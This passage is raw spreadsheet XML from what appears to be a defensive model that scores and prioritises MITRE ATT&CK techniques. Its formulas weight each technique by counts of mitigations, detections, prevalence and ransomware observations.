        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC508" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD508" s="25" t="str" cm="1">
        <f t="array" ref="AD508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC508)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE508" s="25">
        <f>IF(AD508="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF508" s="25" t="str" cm="1">
        <f t="array" ref="AF508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG508" s="25">
        <f>IF(AF508="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH508" s="25" t="str" cm="1">
        <f t="array" ref="AH508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI508" s="25">
        <f>IF(AH508="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ508" s="25" t="str" cm="1">
        <f t="array" ref="AJ508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK508" s="25">
        <f>IF(AJ508="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL508" s="25" t="str" cm="1">
        <f t="array" ref="AL508">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC508)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM508" s="25">
        <f>IF(AL508="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN508" s="63"/>
      <c r="AO508" s="51"/>
      <c r="AP508" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ508" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR508" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS508" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT508" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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09" spans="1:47">
      <c r="A509" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B509" s="25">
        <f>SUM(H509,M509,V509)*(1+SUM(AE509,AG509,AI509,AK509,AM509))</f>
        <v>0.1198</v>
      </c>
      <c r="C509" s="25" t="s">
        <v>1821</v>
      </c>
      <c r="D509" s="25" t="s">
        <v>1822</v>
      </c>
      <c r="E509" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F509" s="51">
        <v>1</v>
      </c>
      <c r="G509" s="51">
        <v>1</v>
      </c>
      <c r="H509" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I509">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J509">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K509">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L509">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M509" s="25">
        <v>0</v>
      </c>
      <c r="N509" s="51">
        <v>0</v>
      </c>
      <c r="O509" s="51">
        <v>0</v>
      </c>
      <c r="P509" s="51">
        <v>0</v>
      </c>
      <c r="Q509" s="51">
        <v>0</v>
      </c>
      <c r="R509" s="51"/>
      <c r="S509" s="51">
        <v>0</v>
      </c>
      <c r="T509" s="51"/>
      <c r="U509" s="51">
        <v>0</v>
      </c>
      <c r="V509" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W509">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X509">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y509">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z509">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA509">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB509">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC509" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD509" s="25" t="str" cm="1">
        <f t="array" ref="AD509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC509)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE509" s="25">
        <f>IF(AD509="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF509" s="25" t="str" cm="1">
        <f t="array" ref="AF509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG509" s="25">
        <f>IF(AF509="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH509" s="25" t="str" cm="1">
        <f t="array" ref="AH509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI509" s="25">
        <f>IF(AH509="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ509" s="25" t="str" cm="1">
        <f t="array" ref="AJ509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK509" s="25">
        <f>IF(AJ509="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL509" s="25" t="str" cm="1">
        <f t="array" ref="AL509">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC509)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM509" s="25">
        <f>IF(AL509="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN509" s="51"/>
      <c r="AO509" s="51"/>
      <c r="AP509" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ509" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR509" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS509" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT509" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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10" spans="1:47" ht="32.1">
      <c r="A510" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B510" s="25">
        <f>SUM(H510,M510,V510)*(1+SUM(AE510,AG510,AI510,AK510,AM510))</f>
        <v>0.1198</v>
      </c>
      <c r="C510" s="25" t="s">
        <v>1823</v>
      </c>
      <c r="D510" s="25" t="s">
        <v>238</v>
      </c>
      <c r="E510" s="25" t="s">
        <v>1824</v>
      </c>
      <c r="F510" s="51">
        <v>1</v>
      </c>
      <c r="G510" s="51">
        <v>1</v>
      </c>
      <c r="H510" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I510">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J510">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K510">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L510">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M510" s="25">
        <v>0</v>
      </c>
      <c r="N510" s="51">
        <v>0</v>
      </c>
      <c r="O510" s="51">
        <v>0</v>
      </c>
      <c r="P510" s="51">
        <v>0</v>
      </c>
      <c r="Q510" s="51">
        <v>0</v>
      </c>
      <c r="R510" s="51"/>
      <c r="S510" s="51">
        <v>0</v>
      </c>
      <c r="T510" s="51"/>
      <c r="U510" s="51">
        <v>0</v>
      </c>
      <c r="V510" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W510">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X510">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y510">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z510">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA510">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB510">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC510" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD510" s="25" t="str" cm="1">
        <f t="array" ref="AD510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC510)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE510" s="25">
        <f>IF(AD510="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF510" s="25" t="str" cm="1">
        <f t="array" ref="AF510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG510" s="25">
        <f>IF(AF510="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH510" s="25" t="str" cm="1">
        <f t="array" ref="AH510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI510" s="25">
        <f>IF(AH510="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ510" s="25" t="str" cm="1">
        <f t="array" ref="AJ510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK510" s="25">
        <f>IF(AJ510="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL510" s="25" t="str" cm="1">
        <f t="array" ref="AL510">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC510)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM510" s="25">
        <f>IF(AL510="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN510" s="60">
        <v>0</v>
      </c>
      <c r="AO510" s="51">
        <v>0</v>
      </c>
      <c r="AP510" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ510" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR510" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS510" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT510" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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11" spans="1:47" ht="32.1">
      <c r="A511" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B511" s="25">
        <f>SUM(H511,M511,V511)*(1+SUM(AE511,AG511,AI511,AK511,AM511))</f>
        <v>0.1198</v>
      </c>
      <c r="C511" s="25" t="s">
        <v>1825</v>
      </c>
      <c r="D511" s="25" t="s">
        <v>180</v>
      </c>
      <c r="E511" s="25" t="s">
        <v>1826</v>
      </c>
      <c r="F511" s="51">
        <v>1</v>
      </c>
      <c r="G511" s="51">
        <v>1</v>
      </c>
      <c r="H511" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I511">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J511">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K511">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L511">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M511" s="25">
        <v>0</v>
      </c>
      <c r="N511" s="51">
        <v>0</v>
      </c>
      <c r="O511" s="51">
        <v>0</v>
      </c>
      <c r="P511" s="51">
        <v>0</v>
      </c>
      <c r="Q511" s="51">
        <v>0</v>
      </c>
      <c r="R511" s="51"/>
      <c r="S511" s="51">
        <v>0</v>
      </c>
      <c r="T511" s="52" t="s">
        <v>1827</v>
      </c>
      <c r="U511" s="51">
        <v>0</v>
      </c>
      <c r="V511" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W511">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X511">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y511">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z511">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA511">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB511">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC511" s="29" t="s">
        <v>724</v>
      </c>
      <c r="AD511" s="25" t="str" cm="1">
        <f t="array" ref="AD511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC511)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE511" s="25">
        <f>IF(AD511="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF511" s="25" t="str" cm="1">
        <f t="array" ref="AF511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG511" s="25">
        <f>IF(AF511="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH511" s="25" t="str" cm="1">
        <f t="array" ref="AH511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI511" s="25">
        <f>IF(AH511="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ511" s="25" t="str" cm="1">
        <f t="array" ref="AJ511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK511" s="25">
        <f>IF(AJ511="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL511" s="25" t="str" cm="1">
        <f t="array" ref="AL511">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC511)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM511" s="25">
        <f>IF(AL511="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN511" s="51"/>
      <c r="AO511" s="51"/>
      <c r="AP511" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ511" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR511" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS511" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT511" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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12" spans="1:47">
      <c r="A512" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B512" s="25">
        <f>SUM(H512,M512,V512)*(1+SUM(AE512,AG512,AI512,AK512,AM512))</f>
        <v>0.1198</v>
      </c>
      <c r="C512" s="25" t="s">
        <v>1828</v>
      </c>
      <c r="D512" s="25" t="s">
        <v>623</v>
      </c>
      <c r="E512" s="25" t="s">
        <v>1829</v>
      </c>
      <c r="F512" s="51">
        <v>1</v>
      </c>
      <c r="G512" s="51">
        <v>1</v>
      </c>
      <c r="H512" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I512">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J512">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K512">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L512">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M512" s="25">
        <v>0</v>
      </c>
      <c r="N512" s="51">
        <v>0</v>
      </c>
      <c r="O512" s="51">
        <v>0</v>
      </c>
      <c r="P512" s="51">
        <v>0</v>
      </c>
      <c r="Q512" s="51">
        <v>0</v>
      </c>
      <c r="R512" s="51"/>
      <c r="S512" s="51">
        <v>0</v>
      </c>
      <c r="T512" s="52" t="s">
        <v>1830</v>
      </c>
      <c r="U512" s="51">
        <v>0</v>
      </c>
      <c r="V512" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W512">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X512">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y512">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z512">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA512">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB512">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC512" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD512" s="25" t="str" cm="1">
        <f t="array" ref="AD512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC512)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE512" s="25">
        <f>IF(AD512="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF512" s="25" t="str" cm="1">
        <f t="array" ref="AF512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG512" s="25">
        <f>IF(AF512="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH512" s="25" t="str" cm="1">
        <f t="array" ref="AH512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI512" s="25">
        <f>IF(AH512="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ512" s="25" t="str" cm="1">
        <f t="array" ref="AJ512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK512" s="25">
        <f>IF(AJ512="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL512" s="25" t="str" cm="1">
        <f t="array" ref="AL512">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC512)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM512" s="25">
        <f>IF(AL512="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN512" s="51"/>
      <c r="AO512" s="51"/>
      <c r="AP512" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ512" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR512" s="25">
